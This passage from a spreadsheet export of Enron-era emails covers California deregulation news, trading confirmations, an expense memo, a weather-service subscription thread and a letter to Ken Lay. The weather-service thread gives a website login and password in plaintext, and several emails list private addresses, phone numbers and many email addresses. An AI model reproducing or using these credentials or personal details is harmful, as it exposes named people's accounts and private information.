damaging ways. That includes billing customers who switch companies for_x000D_
certain overhead costs of their old utilities, such as weather forecasters_x000D_
and accountants involved in procuring electricity._x000D_
In late 1999, a coalition of retailers filed a complaint with the Public_x000D_
Utilities Commission arguing that their customers should not be forced to_x000D_
pay costs for utilities they had decided to leave._x000D_
Earlier this month, the PUC finally reached a decision that favors the_x000D_
retailers' argument but accepts the utilities' calculations of the expenses_x000D_
borne by retailers, an amount critics say is far too low._x000D_
In dissenting, Commissioner Richard A. Bilas called the decision's paltry_x000D_
award to retailers another strike against them._x000D_
"We cannot keep stymieing retail competition if we are seeking rational_x000D_
markets," he said. "Energy service providers [retailers] have left the state_x000D_
in droves. . . . They need all the encouragement we can give them."_x000D_
_x000D_
Retailers Found Little Opportunity_x000D_
Be they multinational giants or kitchen-table entrepreneurs, retailers are_x000D_
dismayed by their experiences with deregulation._x000D_
Enron spent $5 million trying to sell electricity in 1997 and the spring of_x000D_
1998. But, unable to offer enticing discounts, the firm picked up only_x000D_
30,000 customers._x000D_
In a recent meeting with reporters and editors at The Times, Enron Chief_x000D_
Executive Kenneth Lay suggested that the framers of deregulation kept market_x000D_
forces pinned down in the retail sector. As a result, there was little money_x000D_
to be made and little incentive to stick around._x000D_
"The more customers you signed up," Lay said, "the more [money] you lost."_x000D_
Last week, Enron returned a number of its remaining electricity contracts to_x000D_
PG&amp;E. "In the end," Lay said, "we couldn't change the rules and we pulled_x000D_
out."_x000D_
On the other end of the spectrum, Paul Oshideri is now a one-man operation_x000D_
since he laid off his seven employees during his unprofitable two years_x000D_
trying to entice customers to Cucamonga Energy._x000D_
"You don't have that many options," said Oshideri, who is still holding on_x000D_
to his 250 customers and vows not to quit. "What can you do? You can't do_x000D_
anything right now."_x000D_
Only when it came to businesses and big institutions such as universities_x000D_
were retailers able to make a dent in the market. The small price reductions_x000D_
they offered translated into huge savings for those large users of_x000D_
electricity. The retailers also offered a variety of other services,_x000D_
including aid to help businesses become more energy efficient._x000D_
Although fewer than 2% of all residential customers have switched to new_x000D_
energy companies, 13% of industrial users have done so, according to the_x000D_
Public Utilities Commission._x000D_
"If they'd structured this differently they would have had households able_x000D_
to make big savings just like industrials," said Cal State Fullerton_x000D_
economist Robert Michaels._x000D_
There is some dispute among deregulation critics over whether legislators_x000D_
designed the law to protect the utilities from an onslaught of competition,_x000D_
or it just turned out that way._x000D_
Jesse Knight, a former member of the Public Utilities Commission who_x000D_
dissented on the panel's deregulation plan, said the law is biased against_x000D_
retail competition._x000D_
"But I don't think it was the legislation's intent to protect the monopoly,"_x000D_
Knight said._x000D_
There is general agreement, however, that not enough attention was paid to_x000D_
the mechanics of the retail market._x000D_
Much of the deregulation legislation deals with generation, transmission and_x000D_
wholesale prices of electricity. The only provisions on the retail end_x000D_
simply allow consumers to shop for deals._x000D_
Lay, the Enron executive, recalled that the utilities fought hard to_x000D_
maintain their customer base. The irony is that, with wholesale prices_x000D_
skyrocketing over the last six months, buying electricity for all those_x000D_
customers has driven the utilities to the brink of insolvency._x000D_
"With 20-20 hindsight, I expect they wish they'd agreed to more choice at_x000D_
the customer level," Lay said. "Then maybe they wouldn't be in the_x000D_
circumstances they're in."_x000D_
   News &lt;/news&gt; Politics &lt;/news/politics&gt; Entertainment_x000D_
&lt;http://www.calendarlive.com&gt; music &lt;http://www.calendarlive.com/music&gt;,_x000D_
movies &lt;http://www.calendarlive.com/movies/&gt;, art_x000D_
&lt;http://www.calendarlive.com/art/&gt;, TV &lt;http://www.calendarlive.com/tvent/&gt;,_x000D_
restaurants_x000D_
&lt;http://www.calendarlive.com/top/1,1419,L-LATimes-Restaurants-X!Front,00.htm_x000D_
l&gt;    &lt;&lt;...OLE_Obj...&gt;&gt;    Business &lt;/business&gt; Travel &lt;/travel&gt;_x000D_
Classifieds &lt;/class&gt; jobs &lt;/class/employ&gt;, homes &lt;/class/realestate&gt;, cars_x000D_
&lt;http://www.cars.com/carsapp/latimes/?srv=parser&amp;act=display&amp;tf=/index-defau_x000D_
lt.tmpl&gt;, rentals &lt;/class/rentals&gt;    &lt;&lt;...OLE_Obj...&gt;&gt;    Sports_x000D_
&lt;http://sports.latimes.com&gt; Commentary &lt;/news/comment/&gt; Shopping_x000D_
&lt;http://www.latimes.com/class/2shop/menus/&gt;     &lt;&lt;...OLE_Obj...&gt;&gt;    _x000D_
 &lt;&lt;...OLE_Obj...&gt;&gt; _x000D_
Copyright 2001 Los Angeles Times _x000D_
_x000D_
_x000D_
STEVAN ALLEN_x000D_
Vice President_x000D_
Edelman Public Relations Worldwide_x000D_
1215 K Street - Suite 970_x000D_
Sacramento, CA 95814_x000D_
_x000D_
916/442-2331 - phone_x000D_
916/447-8509 - fax_x000D_
stevan.allen@edelman.com_x000D_
 &lt;&lt;Allen, Stevan.vcf&gt;&gt; _x000D_
</t>
  </si>
  <si>
    <t>Fri, 8 Jun 2001 09:11:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'marisa.rapacioli@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'graham.dunbar@enron.com', 'richard.sage@enron.com', 'mark.evans@enron.com', 'anne.edgley@enron.com', 'joe.gold@enron.com', 'adam.overfield@enron.com', 'fernley.dyson@enron.com', 'tani.nath@enron.com', 'brian.stanley@enron.com', 'melissa.allen@enron.com', 'carey.sloan@enron.com', 'richard.shapiro@enron.com', 'john.robinson@enron.com', 'paul.freeman@enron.com', 'rod.sayers@enron.com', 'paul.goddard@enron.com', 'mike.jordan@enron.com', 'richard.lewis@enron.com', 'heidi.mason@enron.com', 'ted.ii@enron.com', 'john.chappell@enron.com', 'jan-erland.bekeng@enron.com', 'bryan.seyfried@enron.com', 'kevin.ruffcorn@enron.com', 'jackie.gentle@enron.com', 'drew.lynch@enron.com', 'amita.gosalia@enron.com', 'brynjar.wiersholm@enron.com', 'mark.pickering@enron.com', 'eric.shaw@enron.com', 'thor.lien@enron.com', 'peter.hutchinson@enron.com'})</t>
  </si>
  <si>
    <t>PL Reforecast (CE2) July to December 2001</t>
  </si>
  <si>
    <t xml:space="preserve">The plan reforecast we went through after Q1 resulted in a reduced expense _x000D_
base of $28m for the year.  This is still short of our target of $50m to _x000D_
$100m.  As you are aware we reforecast our expenses on a quarterly basis and _x000D_
for Q2 I want you to work with your management accountant to produce the _x000D_
below pack by June 30th.  Management accounting will critic the packs and _x000D_
provide a detailed analysis of overs and unders to the Office of the Chair.  _x000D_
If necessary meetings will be held with you and the Office of the Chair to go _x000D_
through your numbers in detail.  If you have any questions about the below _x000D_
please contact Stephen Wood or your management accountant who should be _x000D_
contacting you shortly to discuss.  _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 23 Oct 2001 15:59:54 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jcharlton@nyiso.com'})</t>
  </si>
  <si>
    <t>SCR Meeting</t>
  </si>
  <si>
    <t>_x000D_
JCharlton@nyiso.com writes to the NYISO_TECH_EXCHANGE Discussion List:_x000D_
_x000D_
There is an ICWG Meeting scheduled for November 1 from 9AM-3PM.  There is_x000D_
also a Demand Response WG Meeting planned for November 2.  I would like to_x000D_
meet with any, or all, SCR RIPs to discuss the form and substance of SCR_x000D_
Certifications, Event Reporting, Metering requirements and expectations,_x000D_
Deficiencies and charges, derating methodology, UCAP, etc....ALL RIPs_x000D_
should participate, if possible._x000D_
_x000D_
It seems possible to meet on the afternoon of October 31, before or after_x000D_
the ICWG meeting on November 1, or prior to the Demand Response WG meeting_x000D_
on November 2.  Please advise of your availability.</t>
  </si>
  <si>
    <t>Fri, 9 Mar 2001 04:47:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Revised list of PRC Reps</t>
  </si>
  <si>
    <t xml:space="preserve">Make sure this is consistent with the lists we put in the memo.  thanks_x000D_
----- Forwarded by Steven J Kean/NA/Enron on 03/09/2001 12:46 PM -----_x000D_
_x000D_
	Charlene Jackson_x000D_
	03/09/2001 12:11 PM_x000D_
		 _x000D_
		 To: Steven J Kean/NA/Enron@Enron, Stanley_Horton@Enron.com@Eott_x000D_
		 cc: _x000D_
		 Subject: Revised list of PRC Reps_x000D_
_x000D_
Attached is the document reflecting the changes in the PRC Reps pursuant to _x000D_
our conversation yesterday afternoon.  Please call if you need any additional _x000D_
information._x000D_
Charlene_x000D_
3-9233_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Missing Chris Mallory Deals from yesterday</t>
  </si>
  <si>
    <t>Hi Kate,_x000D_
_x000D_
I have three deals so far that I did not verbal with prebon on yesterday and _x000D_
they sent over confirmations for them. _x000D_
Can you please check with Chris Mallory and see if these are good deals._x000D_
_x000D_
Sell to PGET January PV 25 mw at $260.00_x000D_
Buy from Aquila January PV 25 mw at $260.00_x000D_
Buy from Edison Mission Dec 6- Dec 31 Mid-C 25 mw at $550.00</t>
  </si>
  <si>
    <t>Tue, 13 Mar 2001 08:32:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">O.K.   just give me a buz when the deal is entered._x000D_
_x000D_
 Thanks!!_x000D_
_x000D_
_x000D_
   Kate Symes @ ECT                03/13/2001 04:13 PM_x000D_
_x000D_
To: Evelyn Metoyer/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Missing deal?_x000D_
  _x000D_
_x000D_
Tracy just told me this counterparty (PPL Montana) is still pending credit. _x000D_
Mike Swerzbin said he would prefer to wait this out, because he stands to _x000D_
make money on the deal. So in the meantime, I've been told by credit that we _x000D_
can't enter the deal in the system and calc it. I'm not sure how this works _x000D_
in your case with the Prebon check-out, but basically it's a pending credit _x000D_
deal that will potentially show up in our system once EPMI and PPL Montana _x000D_
reach an agreement. Does that help? Let me know._x000D_
_x000D_
Thanks,_x000D_
Kate_x000D_
_x000D_
_x000D_
_x000D_
Evelyn Metoyer@ENRON_x000D_
03/13/2001 11:22 AM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Missing deal?_x000D_
  _x000D_
_x000D_
Hi Kate, what's the status of this deal?_x000D_
_x000D_
_x000D_
_x000D_
   Kate Symes @ ECT                03/12/2001 10:57 AM_x000D_
_x000D_
To: Evelyn Metoyer/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Missing deal?_x000D_
  _x000D_
_x000D_
this deal is contingent on credit - he'll let me know later today whether or _x000D_
not it's a good trade._x000D_
_x000D_
thanks,_x000D_
Kate_x000D_
_x000D_
_x000D_
_x000D_
Evelyn Metoyer@ENRON_x000D_
03/12/2001 09:00 AM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Missing deal?_x000D_
  _x000D_
_x000D_
sorry Friday, 3/9_x000D_
_x000D_
_x000D_
_x000D_
   Kate Symes @ ECT                03/12/2001 10:52 AM_x000D_
_x000D_
To: Evelyn Metoyer/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Missing deal?_x000D_
  _x000D_
_x000D_
what was the trade date on this?_x000D_
_x000D_
_x000D_
_x000D_
Evelyn Metoyer@ENRON_x000D_
03/12/2001 08:58 AM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Missing deal?_x000D_
_x000D_
_x000D_
_x000D_
Prebon sent over a confirm for a deal where:_x000D_
Enron (Mike Swerzbin) buys from PPL Montana Cal'04-Cal'06 25 mw of Mid-C at _x000D_
$45.00 off-peak hours._x000D_
_x000D_
They did not tell me about this deal during checkout.  Can you please check _x000D_
with Mike._x000D_
_x000D_
Thanks!!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 12 Apr 2002 05:07:31 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Weather repiort</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
-----Original Message-----_x000D_
From: Schockling, Gregory _x000D_
Sent: Friday, April 12, 2002 6:34 AM_x000D_
To: Parks, Joe; Bond, Ragan; Parks, Joe; Knoblauh, Jay; Smith, Tiffany;_x000D_
Stephens, Jeffery_x000D_
Subject: FW: Weather repiort_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Matt Rogers [mailto:mrogers@earthsat.com]_x000D_
Sent: Friday, April 12, 2002 2:05 AM_x000D_
To: Schockling, Gregory_x000D_
Subject: RE: Weather repiort_x000D_
_x000D_
_x000D_
Greg,_x000D_
_x000D_
Good morning. I really apologize about yesterday. The webmaster decided to_x000D_
tighten up the web address and it is now:_x000D_
_x000D_
_x000D_
www.earthsat.com/misc/bridge_x000D_
_x000D_
login: bridge_x000D_
password: cajun_x000D_
_x000D_
It all should work fine now. Sorry for the confusion on our part._x000D_
_x000D_
Take care,_x000D_
_x000D_
Matt_x000D_
_x000D_
-----Original Message-----_x000D_
From: Schockling, Gregory [mailto:Gregory.Schockling@bridgeline.net]_x000D_
Sent: Thursday, April 11, 2002 3:43 PM_x000D_
To: Matt Rogers_x000D_
Subject: RE: Weather repiort_x000D_
_x000D_
_x000D_
Matt,_x000D_
_x000D_
Do you know if we're set up yetI caould not get int6o the page today._x000D_
_x000D_
_x000D_
Thanks_x000D_
_x000D_
Greg_x000D_
_x000D_
-----Original Message-----_x000D_
From: Matt Rogers [mailto:mrogers@earthsat.com]_x000D_
Sent: Wednesday, April 10, 2002 1:22 PM_x000D_
To: Schockling, Gregory_x000D_
Subject: RE: Weather repiort_x000D_
_x000D_
_x000D_
No, I can set you up on the web this afternoon and we can call this next_x000D_
week your free trial!_x000D_
_x000D_
I'll send info to our web support right now. It should be up late this_x000D_
afternoon or tomorrow morning._x000D_
_x000D_
Let's do this:_x000D_
_x000D_
www.earthsat.com/misc/bridgeline_x000D_
_x000D_
login: bridge_x000D_
password: cajun_x000D_
_x000D_
Please use all lower case, since it will be cap-sensitive._x000D_
_x000D_
I'll be out of the office tomorrow, but I'll have someone checking my e-mail_x000D_
if you have any problems with the website._x000D_
_x000D_
The webmaster is Darren Prager (dprager@earthsat.com)._x000D_
_x000D_
Thanks again!!_x000D_
_x000D_
Matt_x000D_
_x000D_
-----Original Message-----_x000D_
From: Schockling, Gregory [mailto:Gregory.Schockling@bridgeline.net]_x000D_
Sent: Wednesday, April 10, 2002 1:46 PM_x000D_
To: Matt Rogers_x000D_
Subject: RE: Weather repiort_x000D_
_x000D_
_x000D_
Matt,_x000D_
_x000D_
The contract looks fine, my only question is do we have to wait till the_x000D_
20th to get web access?  Just explain to me when we can begin receiving the_x000D_
service._x000D_
_x000D_
Thanks again,_x000D_
_x000D_
Greg Schockling_x000D_
_x000D_
-----Original Message-----_x000D_
From: Matt Rogers [mailto:mrogers@earthsat.com]_x000D_
Sent: Wednesday, April 10, 2002 12:22 PM_x000D_
To: Schockling, Gregory_x000D_
Subject: RE: Weather repiort_x000D_
_x000D_
_x000D_
Greg,_x000D_
_x000D_
Good afternoon. I'm attaching a contract agreement, which includes a_x000D_
discount for the smaller number of users. Please let me know if you have any_x000D_
questions or concerns regarding the contract.  Otherwise, please sign and_x000D_
fax back to (301)231-5246 or 5020 at your earliest convenience._x000D_
_x000D_
Thanks again!_x000D_
_x000D_
Matt_x000D_
_x000D_
-----Original Message-----_x000D_
From: Schockling, Gregory [mailto:Gregory.Schockling@bridgeline.net]_x000D_
Sent: Wednesday, April 10, 2002 9:40 AM_x000D_
To: Matt Rogers_x000D_
Subject: RE: Weather repiort_x000D_
_x000D_
_x000D_
That sounds good thanks Matt_x000D_
_x000D_
_x000D_
Greg_x000D_
_x000D_
-----Original Message-----_x000D_
From: Matt Rogers [mailto:mrogers@earthsat.com]_x000D_
Sent: Wednesday, April 10, 2002 8:40 AM_x000D_
To: Schockling, Gregory_x000D_
Subject: RE: Weather repiort_x000D_
_x000D_
_x000D_
Greg,_x000D_
_x000D_
Unfortunately not. That service is a hybrid that we offer to both our_x000D_
clients and theirs. The cost for the service is $6600/year. You may want to_x000D_
check with PIRA on your arrangement with them, but typically this is sold_x000D_
separately._x000D_
_x000D_
I'll put a contract together for you with the basic, noon, and an applied_x000D_
discount to account for your group's smaller size._x000D_
_x000D_
Thanks!_x000D_
_x000D_
Matt_x000D_
_x000D_
-----Original Message-----_x000D_
From: Schockling, Gregory [mailto:Gregory.Schockling@bridgeline.net]_x000D_
Sent: Wednesday, April 10, 2002 9:30 AM_x000D_
To: Matt Rogers_x000D_
Subject: RE: Weather repiort_x000D_
_x000D_
_x000D_
Matt,_x000D_
_x000D_
Heres what I think we need here at Bridgeline, the basic service plus the_x000D_
noon update, 1 page.  I also had a question, does this package include the_x000D_
forecast on storage from pira?  We are a Pira client already so I just need_x000D_
clarification on that._x000D_
_x000D_
_x000D_
Let me know then we'll finalize._x000D_
_x000D_
Thanks very much._x000D_
_x000D_
_x000D_
Greg Schockling_x000D_
_x000D_
-----Original Message-----_x000D_
From: Matt Rogers [mailto:mrogers@earthsat.com]_x000D_
Sent: Monday, April 08, 2002 8:30 AM_x000D_
To: Schockling, Gregory_x000D_
Subject: RE: Weather repiort_x000D_
_x000D_
_x000D_
Greg,_x000D_
_x000D_
No problem. I'm attaching this morning's basic for you. If you want, we can_x000D_
keep those products coming to you regularly this week as a free trial until_x000D_
you've decided._x000D_
_x000D_
Take care,_x000D_
_x000D_
Matt_x000D_
_x000D_
-----Original Message-----_x000D_
From: Schockling, Gregory [mailto:Gregory.Schockling@bridgeline.net]_x000D_
Sent: Monday, April 08, 2002 9:24 AM_x000D_
To: Matt Rogers_x000D_
Subject: RE: Weather repiort_x000D_
_x000D_
_x000D_
Thanks Matt I will get back with you later today, I think the basic package_x000D_
with the noon update will be what we're looking at.  Just wighing our_x000D_
options._x000D_
_x000D_
_x000D_
Thanks_x000D_
_x000D_
Greg Schockling_x000D_
_x000D_
-----Original Message-----_x000D_
From: Matt Rogers [mailto:mrogers@earthsat.com]_x000D_
Sent: Monday, April 08, 2002 8:18 AM_x000D_
To: Schockling, Gregory_x000D_
Subject: RE: Weather repiort_x000D_
_x000D_
_x000D_
Greg,_x000D_
_x000D_
Good morning. Enron was paying for a pretty large weather package from us,_x000D_
so it may be a steep cost to get the entire package. Were there just certain_x000D_
products you were using? For example, our basic package, which includes the_x000D_
1-15 day maps, the 16-city forecasts, the 30-day outlook, and phone access_x000D_
is $450/month. The noon update would be an additional $150/month. Since you_x000D_
are a smaller group, I can apply a discount as well...perhaps as much as_x000D_
20%. Let me know what products you were using from the site and I can put_x000D_
together a package and quote for you fairly quickly. I'm attaching our_x000D_
standard price sheet for your reference as well._x000D_
_x000D_
Take care,_x000D_
_x000D_
Matt Rogers_x000D_
Energy Weather Manager_x000D_
Earth Satellite Corporation_x000D_
(301)231-0664 (Phone)_x000D_
(301)231-5020 (Fax)_x000D_
mrogers@earthsat.com_x000D_
_x000D_
-----Original Message-----_x000D_
From: Schockling, Gregory [mailto:Gregory.Schockling@bridgeline.net]_x000D_
Sent: Monday, April 08, 2002 9:09 AM_x000D_
To: mrogers@earthsat.com_x000D_
Subject: Weather repiort_x000D_
_x000D_
_x000D_
Matt,_x000D_
_x000D_
_x000D_
My name is Greg Schockling and I work for Bridgeline Gas Marketing, a_x000D_
parternship between Chevron/Texaco and Enron.  We previously received your_x000D_
energy weather via Enron and effective the 5th we stopped receiving it.  I_x000D_
was wondering what you wouyld charge for us to pick up the service.  Weare a_x000D_
small shop of 5 traders, we operate a pipeline in Louisiana and want to_x000D_
continue the service._x000D_
_x000D_
_x000D_
Can you quote me what the cost would be to continue the service.  My phone_x000D_
nummber is 832-851-2806._x000D_
_x000D_
_x000D_
Thanks_x000D_
_x000D_
_x000D_
Greg Schockling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t>
  </si>
  <si>
    <t>Fri, 8 Dec 2000 11:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Wharton</t>
  </si>
  <si>
    <t xml:space="preserve">Jim,_x000D_
_x000D_
Thanks for coming. _x000D_
I shall arrange o follow up meting, once the PRCs are over._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
James L Bouillion_x000D_
12/08/2000 06:49 AM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Wharton_x000D_
_x000D_
Thank you for inviting me to the meeting with Wharton.  It was very _x000D_
interesting.  Let me know when you want to have the follow-up meeting._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 30 Jan 2002 09:45:14 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'terri_laine@patagonia.com'})</t>
  </si>
  <si>
    <t>Terri Laine_x000D_
169 Ashby Court_x000D_
Oak View, CA_x000D_
Terri_Laine@patagonia.com_x000D_
_x000D_
To Mr. Ken Lay,_x000D_
_x000D_
I'm writing to urge you to donate the millions of dollars you made from_x000D_
selling Enron stock before the company declared bankruptcy to funds,_x000D_
such as Enron Employee Transition Fund and REACH, that benefit the_x000D_
company's employees, who lost their retirement savings, and provide_x000D_
relief to low-income consumers in California, who can't afford to pay_x000D_
their energy bills.  Enron and you made millions out of the pocketbooks_x000D_
of California consumers and from the efforts of your employees._x000D_
_x000D_
Indeed, while you netted well over a $100 million, many of Enron's_x000D_
employees were financially devastated when the company declared_x000D_
bankruptcy and their retirement plans were wiped out.  And Enron made_x000D_
an astronomical profit during the California energy crisis last year.  As a_x000D_
result, there are thousands of consumers who are unable to pay their_x000D_
basic energy bills and the largest utility in the state is bankrupt._x000D_
_x000D_
The New York Times reported that you sold $101 million worth of Enron_x000D_
stock while aggressively urging the company's employees to keep_x000D_
buying it.  Please donate this money to the funds set up to help repair_x000D_
the lives of those Americans hurt by Enron's underhanded dealings._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Terri Laine</t>
  </si>
  <si>
    <t>Thu, 2 Mar 2000 02:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Request Closed: Access Request (EBAS-4GZSXW)</t>
  </si>
  <si>
    <t xml:space="preserve">Do I have a Login ID and Password?_x000D_
_x000D_
Thanks._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Tara Sweitzer_x000D_
03/02/2000 09:28 AM_x000D_
To: Eric Bass/HOU/ECT@ECT_x000D_
cc: Information Risk Management/HOU/ECT@ECT _x000D_
Subject: Request Closed:  Access Request (EBAS-4GZSXW)_x000D_
_x000D_
Security Resource Request: EBAS-4GZSXW has been Closed._x000D_
_x000D_
To view the request, double click your left mouse button on the Notes _x000D_
document link below._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 11:01:52 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'registrar.isc@enron.com'})</t>
  </si>
  <si>
    <t>Your enrollment status has been modified.</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
_x000D_
_x000D_
Dear MONIKA,_x000D_
_x000D_
_x000D_
Your enrollment status has been changed from 'Wait Listed' to _x000D_
'Enrolled' for the following course:_x000D_
_x000D_
_x000D_
Course Title    : Understanding Options_x000D_
Course Code     : UOPTNS-112701_x000D_
Course Type     : Instructor Led Course_x000D_
_x000D_
_x000D_
Starting Date   : Nov 27, 2001 8:00 AM_x000D_
Ending Date     : Nov 28, 2001 5:00 PM_x000D_
_x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>Mon, 8 Jan 2001 07:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Fw: Time &amp; Friends</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Sandra F Brawner/HOU/ECT on 01/08/2001 _x000D_
03:28 PM ---------------------------_x000D_
_x000D_
_x000D_
"Pamela Anderson" &lt;pama9@flash.net&gt; on 01/07/2001 09:23:07 PM_x000D_
To: "Lisa Barnwell" &lt;lisab@discusdental.com&gt;, "Terri Bailey" &lt;tlbkk@aol.com&gt;, _x000D_
"Susan Schnitzer" &lt;S.Schnitzer@worldnet.att.net&gt;, "Sue Caldwell" _x000D_
&lt;sue@mbainsurance.net&gt;, "Strphanie Friedhoff" _x000D_
&lt;Stephanie.g.Friedhoff@pfizer.com&gt;, "Stafford, John" _x000D_
&lt;John.Stafford@commerceone.com&gt;, "Sandra Brawner" _x000D_
&lt;Sandra.F.Brawner@enron.com&gt;, "Pedersen, Julie" &lt;julie.pedersen@neg.pge.com&gt;, _x000D_
"Patricia DeMamiel" &lt;princess3456@dellnet.com&gt;, "Pat Whitty" _x000D_
&lt;dpwhitty@duke-energy.com&gt;, "Nancy Gilbertson" &lt;ngilbertson@earthlink.net&gt;, _x000D_
"Virginia Taylor" &lt;vtaylor@taylormkting.com&gt;, "Morris, Lamar (SUGARCREEK XGH _x000D_
317)" &lt;LMorris1@pclient.ML.com&gt;, "Lee McKinzie" &lt;lmckinzie@stlukes-hou.org&gt;, _x000D_
"Lamar Morris" &lt;lamar_morris@ml.com&gt;, "Kody Newland" _x000D_
&lt;kodynewland@hotmail.com&gt;, "Kathy Bennett" &lt;kathy.m.bennett@usa.conoco.com&gt;, _x000D_
"Kathleen Kennedy" &lt;kmk1@compassbnk.com&gt;, "Kandy Daniel" &lt;Kandydan@aol.com&gt;, _x000D_
"Jerry Anderson" &lt;jeabudman@webtv.net&gt;, "Hough, Lisa" _x000D_
&lt;lisa.hough@neg.pge.com&gt;, "Hadnott, Wanna H." &lt;Wanna.Hadnott@lyondell.com&gt;, _x000D_
"Gregg Anderson" &lt;TEJASGREGG@aol.com&gt;, "Dillard, Kari K" &lt;dillarkk@bp.com&gt;, _x000D_
"Diana Ayers" &lt;ayersdg@swbell.net&gt;, "Denise Mosely" &lt;denisem@houston.rr.com&gt;, _x000D_
"Dayna Erck" &lt;derck@pdq.net&gt;, "Dayna Erck" &lt;derck@medicalprofiles.com&gt;, "Dawn _x000D_
Doga" &lt;dawndoga@aol.com&gt;, "David Dutch" &lt;dutchd@kochind.com&gt;, "Chris _x000D_
Papousek" &lt;cpapousek@aol.com&gt;, "Carol Buckley" &lt;gbuckley@houston.rr.com&gt;, _x000D_
&lt;Camille.Gerard@enron.com&gt;, "Brian Spack" &lt;ashleynix@prodigy.net&gt;, "angie _x000D_
schniers" &lt;angie.schniers@williams.com&gt;, "Amanda C. Herzer" _x000D_
&lt;acherzer@aol.com&gt;, "Ted Erck" &lt;terck@medicalprofiles.com&gt;_x000D_
cc:  _x000D_
Subject: Fw: Time &amp; Friends_x000D_
_x000D_
_x000D_
_x000D_
----- Original Message -----_x000D_
From: Kevin Cokinos &lt;kcokinos@compuserve.com&gt;_x000D_
To: Pamela Anderson &lt;pama9@flash.net&gt;_x000D_
Sent: Sunday, January 07, 2001 6:18 PM_x000D_
Subject: Fw: Time &amp; Friends_x000D_
_x000D_
_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; -------------Forwarded Message-----------------_x000D_
&gt;_x000D_
&gt; From: "Rocky Stevens", INTERNET:rstevens@amelangpartners.com_x000D_
&gt; To:_x000D_
&gt; Date: 1/6/2001 11:44 AM_x000D_
&gt;_x000D_
&gt; RE: Fw: Time &amp; Friends_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; ----- Original Message -----_x000D_
&gt; From: "Rocky Stevens" &lt;rstevens@amelangpartners.com&gt;_x000D_
&gt; To: "Rocky Stevens" &lt;rstevens@amelangpartners.com&gt;_x000D_
&gt; Sent: Saturday, January 06, 2001 11:52 AM_x000D_
&gt; Subject: Fw: Time &amp; Friends_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; &gt;          TIME AND FRIENDS_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;Imagine there is a bank that_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;credits your account each morning_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;with  $86,400. It carries over no_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;balance from day to day. Every_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;evening deletes whatever part of_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;the balance you failed to use_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;during the day. What would you_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;do? Draw out ALL OF IT, of_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;course!!!!_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;Each of us has such a bank. Its_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;name is TIME. Every morning, it_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;credits you with 86,400_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;seconds._x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;Every night it writes off, as_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;lost, whatever of this you have_x000D_
&gt; &gt; &gt;  &gt; &gt; &gt; &gt; &gt;failed to invest to good purpose._x000D_
